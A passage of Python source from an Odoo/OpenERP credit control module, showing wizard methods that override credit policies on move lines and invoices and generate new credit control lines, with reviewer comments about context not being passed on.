        domain = [('move_line_id', 'in', [x.id for x in move_lines])]
        credits_ids = credit_model.search(cr, uid, domain, context=context)
        credit_model.write(cr, uid,
                           credits_ids,
                           {'manually_overridden': True},
                           context)
        return credits_ids

    def _set_invoice_policy(self, cr, uid, move_line_ids, policy,
                            context=None):
        """Force policy on the invoices related to `move_line_ids`."""
        invoice_model = self.pool['account.invoice']
        invoice_ids = set([x.invoice.id for x in move_line_ids if x.invoice])
        invoice_model.write(cr, uid, list(invoice_ids),
                            {'credit_policy_id': policy.id},
                            context=context)

    def _check_accounts_policies(self, cr, uid, lines, policy, context=None):
        # Validate that the chosen policy is allowed on every account
        # touched by the selected move lines; delegated check raises
        # on violation.
        policy_obj = self.pool['credit.control.policy']
        for line in lines:
            policy_obj.check_policy_against_account(
                cr, uid,
                line.account_id.id,
                policy.id,
                context=context
            )
        return True

    def set_new_policy(self, cr, uid, wizard_id, context=None):
        """Set new policy on an invoice.

        This is done by creating a new credit control line
        related to the move line and the policy set in
        the wizard form.

        :return: ir.actions.act_window dict
        """
        assert len(wizard_id) == 1, "Only one id expected"
        wizard_id = wizard_id[0]
        credit_line_model = self.pool['credit.control.line']
        ir_model = self.pool['ir.model.data']
        ui_act_model = self.pool['ir.actions.act_window']
        wizard = self.browse(cr, uid, wizard_id, context=context)
        controlling_date = fields.date.today()
        # NOTE(review): context is not forwarded to this check, unlike
        # the other calls below -- confirm whether that is intentional.
        self._check_accounts_policies(
            cr,
            uid,
            wizard.move_line_ids,
            wizard.new_policy_id)
        self._mark_as_overridden(
            cr,
            uid,
            wizard.move_line_ids,
            context=context
        )
        # As discussed with business expert
        # draft lines should be passed to ignored
        # if same level as the new one
        # As it is a manual action
        # We also ignore rounding tolerance
        generated_ids = None
        # NOTE(review): context=None here (not context=context) drops the
        # caller's context (e.g. language) -- verify this is deliberate.
        generated_ids = credit_line_model.create_or_update_from_mv_lines(
            cr, uid, [],
            [x.id for x in wizard.move_line_ids],
            wizard.new_policy_level_id.id,
            controlling_date,
            check_tolerance=False,
            context=None
        )
        self._set_invoice_policy(cr, uid,
                                 wizard.move_line_ids,
                                 wizard.new_policy_id,
                                 context=context)
        if not generated_ids:
            return {}
        view_id = ir_model.get_object_reference(cr, uid,
                                                "account_credit_control",
                                                "credit_control_line_action")
        assert view_id, 'No view found'
        action = ui_act_model.read(cr, uid, view_id[1], context=context)
        action['domain'] = [('id', 'in', generated_ids)]
        return action
| agpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.